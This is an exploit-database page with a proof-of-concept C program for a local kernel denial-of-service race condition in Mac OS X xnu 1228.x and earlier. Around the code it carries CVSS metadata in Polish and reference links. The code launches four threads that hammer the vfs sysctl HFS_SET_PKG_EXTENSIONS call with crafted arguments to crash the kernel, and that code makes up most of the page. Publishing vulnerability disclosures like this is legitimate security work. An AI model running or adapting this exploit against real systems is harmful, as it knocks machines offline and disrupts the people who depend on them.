Mac OS X xnu <=1228.x (vfssysctl) Local Kernel DoS PoC

2009.04.05
Credit: mu-b
Risk: Medium
Local: Yes
Remote: No
CWE: CWE-362


Ogólna skala CVSS: 7.2/10
Znaczenie: 10/10
Łatwość wykorzystania: 3.9/10
Wymagany dostęp: Lokalny
Złożoność ataku: Niska
Autoryzacja: Nie wymagana
Wpływ na poufność: Pełny
Wpływ na integralność: Pełny
Wpływ na dostępność: Pełny

/* xnu-vfssysctl-dos.c * * Copyright (c) 2008 by <mu-b@digit-labs.org> * * Apple MACOS X xnu <= 1228.x local kernel DoS POC * by mu-b - Wed 19 Nov 2008 * * - Tested on: Apple MACOS X 10.5.5 (xnu-1228.8.20~1/RELEASE_I386) * * - Private Source Code -DO NOT DISTRIBUTE - * http://www.digit-labs.org/ -- Digit-Labs 2008!@$! */ #include <stdio.h> #include <stdlib.h> #include <hfs/hfs_mount.h> #include <pthread.h> #include <string.h> #include <sys/mount.h> #include <sys/types.h> #include <sys/sysctl.h> #include <unistd.h> void hammer (void *arg) { char buf[1024 * (255 + 1)]; int n, name[6]; memset (buf, 0, sizeof buf); while (1) { name[0] = CTL_VFS; name[1] = 17; name[2] = HFS_SET_PKG_EXTENSIONS; name[3] = (int) buf; name[4] = 1024; name[5] = (rand () % 254) + 1; n = sysctl (name, 6, NULL, NULL, NULL, 0); usleep(10); } } int main (int argc, char **argv) { int i, n, tid; printf ("Apple MACOS X xnu <= 1228.x local kernel DoS PoC\n" "by: <mu-b@digit-labs.org>\n" "http://www.digit-labs.org/ -- Digit-Labs 2008!@$!\n\n"); for (i = 0; i < 4; i++) { n = pthread_create (&tid, NULL, hammer, NULL); if (n < 0) { fprintf (stderr, "failed creating hammer thread\n"); return (EXIT_FAILURE); } } while (1) sleep (1); /* not reached! */ return (EXIT_SUCCESS); }

Referencje:

http://www.securityfocus.com/bid/34202
http://www.milw0rm.com/exploits/8265
http://www.informationweek.com/news/hardware/mac/showArticle.jhtml?articleID=216401181
http://www.digit-labs.org/files/exploits/xnu-vfssysctl-dos.c


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2021, cxsecurity.com

 

Back to Top